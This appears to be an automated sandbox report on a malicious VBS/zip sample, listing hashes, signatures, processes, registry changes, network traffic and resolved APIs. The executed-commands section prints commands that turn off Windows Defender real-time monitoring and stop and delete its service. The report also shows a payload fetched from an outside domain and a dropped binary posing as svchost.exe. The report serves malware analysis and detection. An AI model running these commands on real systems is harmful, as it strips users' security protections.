- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "VBS_b5964a141f9dbd403f703fabcb67a35d.php"
- [*] File Size: 78441
- [*] File Type: "Zip archive data, at least v2.0 to extract"
- [*] SHA256: "768c9a779430e24806e214136c54f2846a0165fe999a567dbb9d44181c4d7e81"
- [*] MD5: "b5964a141f9dbd403f703fabcb67a35d"
- [*] SHA1: "69993f8f23add05b683b3f34ee11eb1a973d5055"
- [*] SHA512: "c6f9748e0990d2836332bba09d57e642780ccaec467a46209accd24eb1f58f72287c359fffabaa547391fe2f0cfc426b7ebc2ba5f192d21dbab6cea5d6146852"
- [*] CRC32: "680AAA93"
- [*] SSDEEP: "1536:RL+mf26Li1mrzd/P8Nsh8HBGvdZ6BpJA+NeK8XZqMPUuZh++vuioeOt+BuIAAoCF:Ff26Li1Qmg3dug+oJqMPUuZ/uF5+ZPIw"
- [*] Process Execution: [
- "wscript.exe",
- "rst.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "powershell.exe",
- "svchost.exe",
- "services.exe",
- "lsass.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "At least one process apparently crashed during execution",
- "Details": []
- },
- {
- "Description": "Attempts to connect to a dead IP:Port (1 unique time)",
- "Details": [
- {
- "IP": "67.23.226.169:80"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "cmd.exe, PID 2036"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "rst.exe -> cmd"
- },
- {
- "Process": "rst.exe -> cmd"
- },
- {
- "Process": "rst.exe -> cmd"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov"
- }
- ]
- },
- {
- "Description": "Attempts to stop active services",
- "Details": [
- {
- "servicename": "WinDefend"
- }
- ]
- },
- {
- "Description": "Repeatedly calls a single API many times, likely to delay analysis",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13851600 times"
- }
- ]
- },
- {
- "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
- "Details": [
- {
- "modified_name": "svchost.exe",
- "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
- "original_name": "svchost.exe",
- "original_path": "C:\\Windows\\system32\\svchost.exe"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP"
- }
- ]
- },
- {
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details": []
- },
- {
- "Description": "Attempts to disable Windows Defender",
- "Details": []
- }
- ]
- [*] Started Service: [
- "KeyIso",
- "WerSvc",
- "W32Time"
- ]
- [*] Executed Commands: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
- "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
- "cmd /c sc stop WinDefend",
- "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
- "cmd /c sc delete WinDefend",
- "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
- "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
- "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "C:\\Windows\\system32\\svchost.exe",
- "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "sc stop WinDefend",
- "sc delete WinDefend",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\WerFault.exe -u -p 1376 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\""
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "Global\\838B6C9EB27932960",
- "Local\\WERReportingForProcess1376",
- "Global\\\\xe5\\x88\\x90\\xc2\\xab",
- "Global\\\\xe1\\x9f\\xa0\\xc6\\xbb",
- "WERUI_BEX64-e0bfc78dc22baf57413d9e3a2494cb68424d695b"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\II18I4UZ54PZUJWBX0PM.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
- "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA153.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA9EF.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERAA10.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERB396.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3000.32601437",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3000.32601453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3000.32601453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2220.32602921",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2220.32602921",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2220.32602921",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
- "DisableNotifications",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "pearlprofessionalmassage.co.nz",
- "answers": [
- {
- "data": "67.23.226.169",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "67.23.226.169",
- "domain": "pearlprofessionalmassage.co.nz"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov",
- "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
- "method": "GET",
- "host": "pearlprofessionalmassage.co.nz",
- "version": "1.1",
- "path": "/simpleresuct.gov",
- "data": "GET /simpleresuct.gov HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pearlprofessionalmassage.co.nz\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "office": {
- "Metadata": {
- "HasMacros": "No"
- }
- }
- }
- [*] Resolved APIs: [
- "advapi32.dll.SaferIdentifyLevel",
- "advapi32.dll.SaferComputeTokenFromLevel",
- "advapi32.dll.SaferCloseLevel",
- "ole32.dll.CLSIDFromProgIDEx",
- "ole32.dll.CoGetClassObject",
- "wscript.exe.#1",
- "urlmon.dll.#326",
- "urlmon.dll.#327",
- "shell32.dll.#685",
- "shell32.dll.#688",
- "urlmon.dll.#395",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "winhttp.dll.WinHttpCheckPlatform",
- "winhttp.dll.WinHttpOpen",
- "winhttp.dll.WinHttpConnect",
- "winhttp.dll.WinHttpOpenRequest",
- "winhttp.dll.WinHttpCloseHandle",
- "winhttp.dll.WinHttpSendRequest",
- "winhttp.dll.WinHttpReceiveResponse",
- "winhttp.dll.WinHttpAddRequestHeaders",
- "winhttp.dll.WinHttpQueryHeaders",
- "winhttp.dll.WinHttpReadData",
- "winhttp.dll.WinHttpWriteData",
- "winhttp.dll.WinHttpQueryDataAvailable",
- "winhttp.dll.WinHttpQueryOption",
- "winhttp.dll.WinHttpSetOption",
- "winhttp.dll.WinHttpSetTimeouts",
- "winhttp.dll.WinHttpCrackUrl",
- "winhttp.dll.WinHttpCreateUrl",
- "oleaut32.dll.#8",
- "oleaut32.dll.#12",
- "shlwapi.dll.StrRChrA",
- "shlwapi.dll.StrCmpNW",
- "oleaut32.dll.#4",
- "oleaut32.dll.#6",
- "kernel32.dll.RegQueryValueExW",
- "oleaut32.dll.#2",
- "kernel32.dll.RegCloseKey",
- "oleaut32.dll.#9",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#2",
- "ws2_32.dll.#21",
- "ws2_32.dll.#9",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.#6",
- "ws2_32.dll.#5",
- "ws2_32.dll.WSARecv",
- "ws2_32.dll.WSASend",
- "oleaut32.dll.#202",
- "oleaut32.dll.#201",
- "ole32.dll.CreateStreamOnHGlobal",
- "oleaut32.dll.#411",
- "oleaut32.dll.#23",
- "oleaut32.dll.#24",
- "ole32.dll.GetHGlobalFromStream",
- "rpcrt4.dll.RpcBindingFree",
- "oleaut32.dll.#500",
- "cryptsp.dll.CryptReleaseContext",
- "cryptsp.dll.CryptAcquireContextA",
- "kernel32.dll.VirtualAlloc",
- "ntdll.dll.memcpy",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.CloseHandle",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "kernel32.dll.Wow64EnableWow64FsRedirection",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegCreateKeyW",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegSetValueExW",
- "shell32.dll.ShellExecuteA",
- "ole32.dll.OleInitialize",
- "cryptbase.dll.SystemFunction036",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoTaskMemAlloc",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "ole32.dll.CoTaskMemFree",
- "comctl32.dll.#236",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "propsys.dll.PSPropertyBag_ReadGUID",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.StringFromGUID2",
- "apphelp.dll.ApphelpCheckShellObject",
- "ole32.dll.CoCreateInstance",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "shell32.dll.#102",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "ole32.dll.CoInitializeEx",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "comctl32.dll.#339",
- "ole32.dll.CoUninitialize",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "propsys.dll.#430",
- "advapi32.dll.RegGetValueW",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.PropVariantClear",
- "ole32.dll.CoAllowSetForegroundWindow",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "comctl32.dll.#386",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptEncrypt",
- "cryptsp.dll.CryptImportKey",
- "cryptbase.dll.SystemFunction040",
- "cryptbase.dll.SystemFunction041",
- "cryptsp.dll.CryptEncrypt",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "shell32.dll.#66",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#333",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.#417",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "propsys.dll.PropVariantToGUID",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "shlwapi.dll.PathRemoveFileSpecW",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegQueryValueExW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlVirtualUnwind",
- "kernel32.dll.IsWow64Process",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.FreeSid",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "kernel32.dll.GlobalMemoryStatusEx",
- "ole32.dll.CoGetContextToken",
- "oleaut32.dll.#149",
- "kernel32.dll.GetUserDefaultUILanguage",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "kernel32.dll.lstrlenW",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "kernel32.dll.lstrcpyW",
- "version.dll.VerLanguageNameW",
- "kernel32.dll.GetCurrentProcessId",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.AdjustTokenPrivileges",
- "kernel32.dll.OpenProcess",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "psapi.dll.GetModuleFileNameExW",
- "kernel32.dll.GetExitCodeProcess",
- "ntdll.dll.NtQuerySystemInformation",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "ole32.dll.CoCreateGuid",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalFree",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "mscorjit.dll.getJit",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.VirtualQuery",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "kernel32.dll.ReleaseMutex",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetEvent",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindClose",
- "mscoree.dll.DllGetClassObject",
- "diasymreader.dll.DllGetClassObjectInternal",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "kernel32.dll.QueryActCtxW",
- "netutils.dll.NetApiBufferFree",
- "kernel32.dll.IsProcessorFeaturePresent",
- "ntdll.dll.RtlUnwind",
- "mscoree.dll._CorExeMain",
- "mscoree.dll._CorImageUnloading",
- "mscoree.dll._CorValidateImage",
- "cryptsp.dll.CryptExportKey",
- "cryptsp.dll.CryptCreateHash",
- "kernel32.dll.SwitchToThread",
- "rpcrt4.dll.UuidFromStringW",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.StartServiceW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "ole32.dll.CoInitializeSecurity",
- "w32time.dll.SvchostEntry_W32Time",
- "w32time.dll.SvchostPushServiceGlobals",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "ws2_32.dll.#115",
- "ws2_32.dll.#111",
- "userenv.dll.RegisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "sechost.dll.QueryServiceConfigW",
- "dsrole.dll.DsRoleGetPrimaryDomainInformation",
- "dsrole.dll.DsRoleFreeMemory",
- "sspicli.dll.LsaRegisterPolicyChangeNotification",
- "w32time.dll.TimeProvClose",
- "w32time.dll.TimeProvCommand",
- "w32time.dll.TimeProvOpen",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#23",
- "ws2_32.dll.WSAEventSelect",
- "vmictimeprovider.dll.TimeProvClose",
- "vmictimeprovider.dll.TimeProvCommand",
